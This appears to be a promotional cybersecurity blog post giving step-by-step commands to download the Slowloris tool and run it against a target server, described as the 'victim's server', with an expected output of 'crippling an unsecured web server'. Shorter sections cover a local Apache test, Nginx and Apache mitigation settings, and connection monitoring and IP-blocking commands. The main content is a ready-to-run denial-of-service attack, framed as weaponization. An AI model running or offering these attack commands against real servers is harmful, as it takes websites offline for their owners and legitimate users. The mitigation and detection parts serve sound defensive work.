Weaponizing Slowloris: Launching Full-Scale DDoS Attacks in Red Team Ops

Listen to this Post

Featured Image
Slowloris is an HTTP Denial of Service (DoS) attack tool designed to overwhelm threaded servers by exhausting their connection pools. Unlike traditional DDoS attacks that flood targets with high traffic, Slowloris maintains multiple partial HTTP requests, keeping connections open for as long as possible.

How Slowloris Works

  • Sends incomplete HTTP requests to the target server.
  • Periodically sends additional headers to keep connections alive.
  • Prevents the server from freeing up resources, making it unable to serve legitimate users.
  • Automatically reconnects if the server drops a connection.

Official Resources

You Should Know: Practical Slowloris Attack Execution

1. Installing Slowloris (Kali Linux)

git clone https://github.com/gkbrk/slowloris.git 
cd slowloris 
chmod +x slowloris.py 

2. Launching a Basic Attack

python3 slowloris.py <target_IP> -p 80 

– Replace `` with the victim’s server IP.
– Use `-p` to specify the port (default: 80).

3. Advanced Slowloris Attack (More Connections)

python3 slowloris.py <target_IP> -p 80 -s 1000 

– `-s 1000` sets the number of sockets (connections).

4. Testing Against a Local Web Server

Spin up a local Apache server for testing:

sudo apt install apache2 
sudo systemctl start apache2 

Then attack it with:

python3 slowloris.py 127.0.0.1 

5. Mitigation Techniques (For Defenders)

  • Rate Limiting with Nginx:
    limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s; 
    
  • Apache Mod_Reqtimeout:
    RequestReadTimeout header=20-40,MinRate=500 body=20-40,MinRate=500 
    
  • Cloudflare / DDoS Protection Services

6. Detecting Slowloris Attacks

netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n 

– Monitors unusual numbers of half-open connections.

What Undercode Say

Slowloris remains a potent tool in red team operations due to its low-bandwidth, high-impact nature. Unlike volumetric attacks, it targets server resource exhaustion, making it harder to mitigate without proper configuration.

Additional Linux & Windows Commands for Cybersecurity:

  • Linux:
    Check active connections 
    ss -tulwn
    
    Block abusive IPs 
    iptables -A INPUT -s <malicious_IP> -j DROP
    
    Monitor HTTP logs 
    tail -f /var/log/apache2/access.log 
    

  • Windows:

    List active connections 
    netstat -ano
    
    Block IP via Firewall 
    New-NetFirewallRule -DisplayName "Block Slowloris" -Direction Inbound -Action Block -RemoteAddress <attacker_IP> 
    

Prediction

As web servers evolve, Slowloris-like attacks will adapt, leveraging HTTP/2 and WebSockets for more sophisticated resource exhaustion. Defenders must implement AI-driven anomaly detection to counter stealthy low-and-slow attacks.

Expected Output:

A functional Slowloris attack crippling an unsecured web server, followed by mitigation logs showing blocked malicious IPs.

[+] Attacking <target_IP> with 500 sockets 
[+] Sending keep-alive headers 
[+] Reconnecting dropped sockets... 

References:

Reported By: Saurabh B294b21aa – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram